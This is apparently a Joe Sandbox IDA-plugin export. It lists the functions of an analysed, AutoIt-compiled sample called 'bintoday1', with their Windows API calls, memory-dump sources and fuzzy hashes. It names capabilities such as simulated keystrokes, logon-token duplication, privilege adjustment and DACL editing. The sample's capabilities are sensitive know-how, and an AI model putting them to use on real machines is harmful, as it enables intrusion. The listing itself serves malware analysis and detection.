Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ea6e38b10ace09e686b49e083c85ba3a8a6c75c65241c6bd0ca6b87dd3bd7ace
Instruction ID: 0801c4620658e70fa69fc391e2fecd242290bbae66a705c4816939eb485fad12
Opcode Fuzzy Hash: ea6e38b10ace09e686b49e083c85ba3a8a6c75c65241c6bd0ca6b87dd3bd7ace
Instruction Fuzzy Hash: 0BE0E53110422497E6312A679C01FEE36D8EB42FB0F8980A8BC0592591DB50DD0187E0

Function 00B94F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00C61418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B94F6D

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: a4707997a70492307f946b69bcf2529eed762d18973e988e5681d1b5a0cd8f64
Instruction ID: 0ad88da37b84220441ff94c2f4d3a5530f016fff13b59b159dddac0a17a94f78
Opcode Fuzzy Hash: a4707997a70492307f946b69bcf2529eed762d18973e988e5681d1b5a0cd8f64
Instruction Fuzzy Hash: 8EF01571105752CFDB349F64D494E66BBE4EF143293208ABEE1EE82A21C7319845DB10

Function 00B92DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B92DC4

Part of subcall function 00B96B57: _wcslen.LIBCMT ref: 00B96B6A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 4c76df083db46c182ab53da00ec2638f768d51913c7cedc94e1f27ca96e0dd46
Instruction ID: fc9f65002b34a34781e59c670f4d4dfff30e63bab5653533b8384737bfde4e36
Opcode Fuzzy Hash: 4c76df083db46c182ab53da00ec2638f768d51913c7cedc94e1f27ca96e0dd46
Instruction Fuzzy Hash: E0E0CD726001245BCB209398DC06FDE77DDDFC8790F0400B1FD09D7248ED60AD848550

Function 00C02693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00C026B5

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 9e158ea6d2913bb45ac352147d93a35940040b0d83699d0401dc8128fdfbbc16
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 4EE04FB0609B005FDF395A28A8517F677E89F49300F10086EF6AF82392E5B37845CA4D

Function 00B92B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00B93837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B93908

Part of subcall function 00B9D730: GetInputState.USER32 ref: 00B9D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00B92B6B

Part of subcall function 00B930F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00B9314E

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 05903743dd7d304823f8a8b943f9b2eb28def3662db3127285141a0d893ccc59
Instruction ID: 73a5d43df5041f8c1eabeb11ab2058c8e351a21c65530cbfe2649be16e14a5d6
Opcode Fuzzy Hash: 05903743dd7d304823f8a8b943f9b2eb28def3662db3127285141a0d893ccc59
Instruction Fuzzy Hash: 39E07D2130024407CE18BB769892BBDB3C9CFD1752F4408BEF24283163CF2449454312

Function 00BD039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00BD0704,?,?,00000000,?,00BD0704,00000000,0000000C), ref: 00BD03B7

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1761f685fff58728a9f71e3047d0e3c96c00819b2660352f3974b9501eb4ff11
Instruction ID: 71dcacaca1f501af6b107802e3a97b2b874febf55c957a874647f5a2a7e16507
Opcode Fuzzy Hash: 1761f685fff58728a9f71e3047d0e3c96c00819b2660352f3974b9501eb4ff11
Instruction Fuzzy Hash: A2D06C3205010DBBDF128F84DD46EDE3BAAFB48714F014000BE1856020C732E832AB90

Function 00B91CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00B91CBC

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 4b5445fb94680359c477b1cf2ad422650efd1b807f6bd2ca1015c2131d6323f9
Instruction ID: 39cccf6fe48e124b151c69863f8da36f6db28876fdb06f4fe925850ea07dc9d4
Opcode Fuzzy Hash: 4b5445fb94680359c477b1cf2ad422650efd1b807f6bd2ca1015c2131d6323f9
Instruction Fuzzy Hash: C3C09B352803049FF2344B81BC4AF1C7754A758B01F084011F60A555F3C3E15410F650

Function 00BED8DD Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00BED8E9

Part of subcall function 00B933A7: _wcslen.LIBCMT ref: 00B933AB

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: PathTemp_wcslen
String ID:
API String ID: 1974555822-0
Opcode ID: 6d46f4f6972e0a423edff15ddf0ffbdd9f931330b142cbe592040ca7fc9458a0
Instruction ID: e9ed5160ed6c5edd3fde365d7b7fd15bf87f3f1f04c71b7bfc540d1f3669e562
Opcode Fuzzy Hash: 6d46f4f6972e0a423edff15ddf0ffbdd9f931330b142cbe592040ca7fc9458a0
Instruction Fuzzy Hash: 54C048B455505A9BDBA0ABA0CDC9BACB3A8EF00701F1080E5E20A910909EB09A898B12

Function 00BAFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00BAFD1F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: c24662316a1f3a6fa519a3a04dbb651c27312c6d28feb6ce9a078079572351ed
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: F831E374A0810A9BC719DF99D4C09A9F7E2FB4A350B2486F5E849CB655E731EDC1CBC0

Function 033422A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 033422B1

Memory Dump Source

Source File: 00000000.00000002.2189549780.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3340000_bintoday1.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 2ca3e3ed42d8b3017e56987678eb1298f91056b8a0019d71e41c4f8de1f27c82
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 7CE0E67494010EDFDB00EFB8D54969E7FF4EF04301F1005A1FD01E2280D6319D508A72

Non-executed Functions

Function 00C29576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C2961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C2965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00C2969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C296C9
SendMessageW.USER32 ref: 00C296F2
GetKeyState.USER32(00000011), ref: 00C2978B
GetKeyState.USER32(00000009), ref: 00C29798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C297AE
GetKeyState.USER32(00000010), ref: 00C297B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C297E9
SendMessageW.USER32 ref: 00C29810
SendMessageW.USER32(?,00001030,?,00C27E95), ref: 00C29918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C2992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C29941
SetCapture.USER32(?), ref: 00C2994A
ClientToScreen.USER32(?,?), ref: 00C299AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C299BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C299D6
ReleaseCapture.USER32 ref: 00C299E1
GetCursorPos.USER32(?), ref: 00C29A19
ScreenToClient.USER32(?,?), ref: 00C29A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C29A80
SendMessageW.USER32 ref: 00C29AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C29AEB
SendMessageW.USER32 ref: 00C29B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C29B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C29B4A
GetCursorPos.USER32(?), ref: 00C29B68
ScreenToClient.USER32(?,?), ref: 00C29B75
GetParent.USER32(?), ref: 00C29B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C29BFA
SendMessageW.USER32 ref: 00C29C2B
ClientToScreen.USER32(?,?), ref: 00C29C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C29CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C29CDE
SendMessageW.USER32 ref: 00C29D01
ClientToScreen.USER32(?,?), ref: 00C29D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C29D82

Part of subcall function 00BA9944: GetWindowLongW.USER32(?,000000EB), ref: 00BA9952

GetWindowLongW.USER32(?,000000F0), ref: 00C29E05

Strings

F, xrefs: 00C29D07
@GUI_DRAGID, xrefs: 00C2997D

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: ce0f073948572e4a220409bd5d57c245dced97b37091ffdb8aed9ce4d9f52424
Instruction ID: a2bbf98fff7eeb40372baa5b466e2272591a5351f2be18a2cbc1c070c338d6cd
Opcode Fuzzy Hash: ce0f073948572e4a220409bd5d57c245dced97b37091ffdb8aed9ce4d9f52424
Instruction Fuzzy Hash: 5042AC34204610AFDB20CF28DC84BAABBF5FF49720F140619FAA987AA1D771E951DF51

Function 00C24873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00C248F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00C24908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00C24927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00C2494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00C2495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00C2497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00C249AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00C249D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00C24A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C24A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C24A7E
IsMenu.USER32(?), ref: 00C24A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C24AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C24B20
GetWindowLongW.USER32(?,000000F0), ref: 00C24B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00C24BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00C24C82
wsprintfW.USER32 ref: 00C24CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C24CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00C24CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C24D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C24D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00C24D5A

Strings

%d/%02d/%02d, xrefs: 00C24CA8

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 433fa5ba96c08fb477217765b8c31033cadad5ead06b7746d13739ea34020622
Instruction ID: cda022ac2d2a6a9affcf9be5b9e965ab091809d1b6430da6f0a0c908adc2b657
Opcode Fuzzy Hash: 433fa5ba96c08fb477217765b8c31033cadad5ead06b7746d13739ea34020622
Instruction Fuzzy Hash: D5121431500224ABEB288F69EC49FBE7BF8EF85710F104169F525DB6E1DB749A41CB50

Function 00BAF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00BAF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BEF474
IsIconic.USER32(00000000), ref: 00BEF47D
ShowWindow.USER32(00000000,00000009), ref: 00BEF48A
SetForegroundWindow.USER32(00000000), ref: 00BEF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BEF4AA
GetCurrentThreadId.KERNEL32 ref: 00BEF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BEF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 00BEF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00BEF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00BEF4DE
SetForegroundWindow.USER32(00000000), ref: 00BEF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BEF4F6
keybd_event.USER32(00000012,00000000), ref: 00BEF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BEF50B
keybd_event.USER32(00000012,00000000), ref: 00BEF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BEF519
keybd_event.USER32(00000012,00000000), ref: 00BEF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BEF528
keybd_event.USER32(00000012,00000000), ref: 00BEF52D
SetForegroundWindow.USER32(00000000), ref: 00BEF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 00BEF557

Strings

Shell_TrayWnd, xrefs: 00BEF46F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 0499ff6d06abc8d376f71f78588f8be236805485201b9fa3e91fee39e66badbb
Instruction ID: 8c690935c20cfa6acfd83b6563c20d2fbef968d726c27f4fda4da45fdcaeeb25
Opcode Fuzzy Hash: 0499ff6d06abc8d376f71f78588f8be236805485201b9fa3e91fee39e66badbb
Instruction Fuzzy Hash: F7316A71A50219BFEB316BB65C8AFBF7EBCEB44B50F100065F601E61D1C7B19D11AAA0

Function 00BF1201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00BF16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BF170D
Part of subcall function 00BF16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BF173A
Part of subcall function 00BF16C3: GetLastError.KERNEL32 ref: 00BF174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00BF1286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00BF12A8
CloseHandle.KERNEL32(?), ref: 00BF12B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00BF12D1
GetProcessWindowStation.USER32 ref: 00BF12EA
SetProcessWindowStation.USER32(00000000), ref: 00BF12F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00BF1310

Part of subcall function 00BF10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BF11FC), ref: 00BF10D4
Part of subcall function 00BF10BF: CloseHandle.KERNEL32(?,?,00BF11FC), ref: 00BF10E9

Strings

winsta0, xrefs: 00BF12CC
default, xrefs: 00BF130B
, xrefs: 00BF125A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 9cf8e49cb8306ab852b22c8f7358a6675760970ccba62b321101b256cc1220d3
Instruction ID: c4c7374b7b379d340d96e76c6ee99448ab014b7ac2b97663e1cec6ce25f617ee
Opcode Fuzzy Hash: 9cf8e49cb8306ab852b22c8f7358a6675760970ccba62b321101b256cc1220d3
Instruction Fuzzy Hash: 26817D71900209EBDF249FA8DC49BFE7BB9EF44700F1449A9FA11B62A0C7708949CF60

Function 00BF0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BF1114
Part of subcall function 00BF10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00BF0B9B,?,?,?), ref: 00BF1120
Part of subcall function 00BF10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00BF0B9B,?,?,?), ref: 00BF112F
Part of subcall function 00BF10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00BF0B9B,?,?,?), ref: 00BF1136
Part of subcall function 00BF10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BF114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BF0BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BF0C00
GetLengthSid.ADVAPI32(?), ref: 00BF0C17
GetAce.ADVAPI32(?,00000000,?), ref: 00BF0C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BF0C6D
GetLengthSid.ADVAPI32(?), ref: 00BF0C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00BF0C8C
HeapAlloc.KERNEL32(00000000), ref: 00BF0C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BF0CB4
CopySid.ADVAPI32(00000000), ref: 00BF0CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BF0CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BF0D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BF0D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BF0D45
HeapFree.KERNEL32(00000000), ref: 00BF0D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BF0D55
HeapFree.KERNEL32(00000000), ref: 00BF0D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BF0D65
HeapFree.KERNEL32(00000000), ref: 00BF0D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00BF0D78
HeapFree.KERNEL32(00000000), ref: 00BF0D7F

Part of subcall function 00BF1193: GetProcessHeap.KERNEL32(00000008,00BF0BB1,?,00000000,?,00BF0BB1,?), ref: 00BF11A1
Part of subcall function 00BF1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00BF0BB1,?), ref: 00BF11A8
Part of subcall function 00BF1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00BF0BB1,?), ref: 00BF11B7

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
